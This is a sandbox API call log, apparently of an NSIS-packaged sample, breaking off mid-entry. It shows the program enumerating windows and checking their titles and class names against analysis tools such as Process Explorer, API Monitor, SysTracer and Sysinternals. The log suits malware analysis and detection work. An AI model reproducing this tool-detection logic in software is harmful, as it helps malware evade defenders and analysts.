returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.681] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.682] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.682] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.682] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.682] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.682] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.682] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.682] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="65622") returned 5 [0158.682] lstrcpyA (in: lpString1=0x430400, lpString2="65622" | out: lpString1="65622") returned="65622" [0158.682] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.682] lstrcpynA (in: lpString1=0x33723c, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.682] lstrcpynA (in: lpString1=0x430000, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.683] lstrcpynA (in: lpString1=0x42e3a0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.683] lstrlenA (lpString="callback1") returned 9 [0158.683] lstrcpynA (in: lpString1=0x40ac18, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.683] lstrcpynA (in: lpString1=0x40b018, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.683] lstrcmpiA (lpString1="callback1", lpString2="callback1") returned 0 [0158.683] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.683] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.683] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.683] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.683] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.683] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.683] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.683] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetWindowText(p r1, t.r2, i1024)", iMaxLength=1024 | out: lpString1="user32::GetWindowText(p r1, t.r2, i1024)") returned="user32::GetWindowText(p r1, t.r2, i1024)" [0158.683] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.683] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.683] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.684] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.684] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.684] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.684] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.684] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.684] lstrcpynA (in: lpString1=0x341200, lpString2="65622", iMaxLength=1024 | out: lpString1="65622") returned="65622" [0158.684] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.684] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.684] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.684] GetWindowTextA (in: hWnd=0x10056, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.685] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="1024") returned 4 [0158.685] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.685] lstrcpyA (in: lpString1=0x430800, lpString2="" | out: lpString1="") returned="" [0158.685] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="65622") returned 5 [0158.685] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.685] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.685] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.685] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.685] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.685] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.685] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.685] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetClassName(p r1, t.r3, i1024)", iMaxLength=1024 | out: lpString1="user32::GetClassName(p r1, t.r3, i1024)") returned="user32::GetClassName(p r1, t.r3, i1024)" [0158.685] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.685] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.685] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.686] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.686] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.686] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.686] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.686] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.686] lstrcpynA (in: lpString1=0x3401e0, lpString2="65622", iMaxLength=1024 | out: lpString1="65622") returned="65622" [0158.686] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.686] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.686] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.686] GetClassNameA (in: hWnd=0x10056, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="Shell_TrayWnd") returned 13 [0158.686] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.686] lstrcpynA (in: lpString1=0x341200, lpString2="Shell_TrayWnd", iMaxLength=1024 | out: lpString1="Shell_TrayWnd") returned="Shell_TrayWnd" [0158.686] lstrcpyA (in: lpString1=0x430c00, lpString2="Shell_TrayWnd" | out: lpString1="Shell_TrayWnd") returned="Shell_TrayWnd" [0158.686] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="65622") returned 5 [0158.687] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.687] lstrlenA (lpString="0") returned 1 [0158.687] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Shell_TrayWnd", iMaxLength=1024 | out: lpString1="Shell_TrayWnd") returned="Shell_TrayWnd" [0158.687] lstrlenA (lpString="Shell_TrayWnd") returned 13 [0158.687] lstrcpynA (in: lpString1=0x40ac18, lpString2="Shell_TrayWnd", iMaxLength=1024 | out: lpString1="Shell_TrayWnd") returned="Shell_TrayWnd" [0158.687] lstrcpynA (in: lpString1=0x40b018, lpString2="PROCEXPL", iMaxLength=1024 | out: lpString1="PROCEXPL") returned="PROCEXPL" [0158.687] lstrcmpiA (lpString1="Shell_TrayWnd", lpString2="PROCEXPL") returned 1 [0158.687] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.687] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.687] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.687] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.687] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.687] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.687] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.687] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.687] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.688] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.688] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.688] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.688] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.688] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.688] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.688] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.688] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.688] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.688] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.688] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.688] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.688] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.688] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.688] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.689] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.689] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.689] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="65810") returned 5 [0158.689] lstrcpyA (in: lpString1=0x430400, lpString2="65810" | out: lpString1="65810") returned="65810" [0158.689] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.689] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.689] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.689] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.689] GetWindowTextA (in: hWnd=0x10112, lpString=0x340df8, nMaxCount=1024 | out: lpString="") returned 0 [0158.689] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="1024") returned 4 [0158.689] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.689] lstrcpyA (in: lpString1=0x430800, lpString2="" | out: lpString1="") returned="" [0158.689] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="65810") returned 5 [0158.690] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.690] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.690] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.690] GetClassNameA (in: hWnd=0x10112, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0158.690] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.690] lstrcpynA (in: lpString1=0x341200, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.690] lstrcpyA (in: lpString1=0x430c00, lpString2="tooltips_class32" | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.690] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="65810") returned 5 [0158.690] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.690] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.690] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.690] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.690] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.690] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.690] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.690] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.691] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.691] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.691] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.691] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.691] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.691] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.691] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.691] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.691] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.691] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.691] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.691] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.691] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.691] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.691] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.691] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.692] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.692] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.692] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="65798") returned 5 [0158.692] lstrcpyA (in: lpString1=0x430400, lpString2="65798" | out: lpString1="65798") returned="65798" [0158.692] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.692] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.692] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.692] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.692] GetWindowTextA (in: hWnd=0x10106, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.692] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="1024") returned 4 [0158.692] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.692] lstrcpyA (in: lpString1=0x430800, lpString2="" | out: lpString1="") returned="" [0158.692] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="65798") returned 5 [0158.692] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.693] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.693] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.693] GetClassNameA (in: hWnd=0x10106, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0158.693] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.693] lstrcpynA (in: lpString1=0x341200, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.693] lstrcpyA (in: lpString1=0x430c00, lpString2="tooltips_class32" | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.693] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="65798") returned 5 [0158.693] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.693] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.693] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.693] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.693] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.693] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.693] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.693] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.693] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.694] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.694] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.694] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.694] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.694] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.694] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.694] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.694] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.694] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.694] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.694] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.694] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.694] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.694] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.694] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.695] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.695] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.695] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="65780") returned 5 [0158.695] lstrcpyA (in: lpString1=0x430400, lpString2="65780" | out: lpString1="65780") returned="65780" [0158.695] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.695] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.695] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.695] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.695] GetWindowTextA (in: hWnd=0x100f4, lpString=0x340df8, nMaxCount=1024 | out: lpString="") returned 0 [0158.695] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="1024") returned 4 [0158.695] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.695] lstrcpyA (in: lpString1=0x430800, lpString2="" | out: lpString1="") returned="" [0158.695] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="65780") returned 5 [0158.695] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.696] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.696] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.696] GetClassNameA (in: hWnd=0x100f4, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0158.696] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.696] lstrcpynA (in: lpString1=0x341200, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.696] lstrcpyA (in: lpString1=0x430c00, lpString2="tooltips_class32" | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.696] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="65780") returned 5 [0158.696] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.696] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.696] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.696] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.696] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.696] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.696] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.696] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.696] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.697] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.697] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.697] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.697] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.697] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.697] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.697] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.697] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.697] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.697] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.697] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.697] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.697] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.697] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.697] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.698] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.698] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.698] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="65740") returned 5 [0158.698] lstrcpyA (in: lpString1=0x430400, lpString2="65740" | out: lpString1="65740") returned="65740" [0158.698] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.698] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.698] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.698] lstrcpyA (in: 